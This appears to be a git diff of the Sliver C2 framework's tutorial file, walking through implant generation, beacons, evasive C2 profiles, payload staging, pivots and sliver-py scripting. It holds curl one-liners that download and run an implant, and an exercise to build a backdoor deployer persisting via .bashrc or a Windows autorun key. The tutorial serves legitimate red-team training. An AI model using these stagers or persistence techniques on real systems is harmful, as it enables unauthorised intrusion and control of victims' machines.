listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file +{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\nThe example below demonstrates how to change and import a profile.\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"# Stagers\n\nWhen using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile and prepare to stage it.\n\n```asciinema\n{\"src\": \"/asciinema/create_profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of:\n```\nhttps://sliver-ip/whatever.stager_file_ext?x=yourID\n```\n\nThere is a lot of flexibility in the form of this URL, the conditions for successfull staging are:\n* The file extension needs to match the c2 profile's stager_file_ext\n* There has to be a one character http url parameter\n* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values\n\nTo expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.\n\n```asciinema\n{\"src\": \"/asciinema/stage_implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can try retrieving our implant, the ID is 19778.\n\n```asciinema\n{\"src\": \"/asciinema/implant_curl.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nSliver staging also supports encoding or encrypting our payloads before exposing them extenrally using the `profile stage` command, the implant configuration remains the same but you are now able to stage different versions of it simultaneously.\n\n```asciinema\n{\"src\": \"/asciinema/stage_compress_encrypt.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nA simple stager could look like this for example in Linux:\n\n```\ncurl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && chmod u+x nothingtoseehere &&nohup ./nothingtoseehere\n```\n\nOr on Windows:\n```\ncurl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\\t.exe\n```"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file From eed6890700e63865f4273cf159428c9ca25096b6 Mon Sep 17 00:00:00 2001 From: Tim Makram Ghatas <47985652+TimBF@users.noreply.github.com> Date: Mon, 22 Jul 2024 20:14:34 +0200 Subject: [PATCH 6/7] update tutorial text and add 1.6 disclaimer --- docs/sliver-docs/nohup.out | 54 ------- .../pages/tutorials/md/1 - Getting Started.md | 4 +- .../tutorials/md/2 - Beacons vs Sessions.md | 4 - .../tutorials/md/4 - HTTP Payload staging.md | 6 +- .../pages/tutorials/md/5 - Pivots.md | 2 - 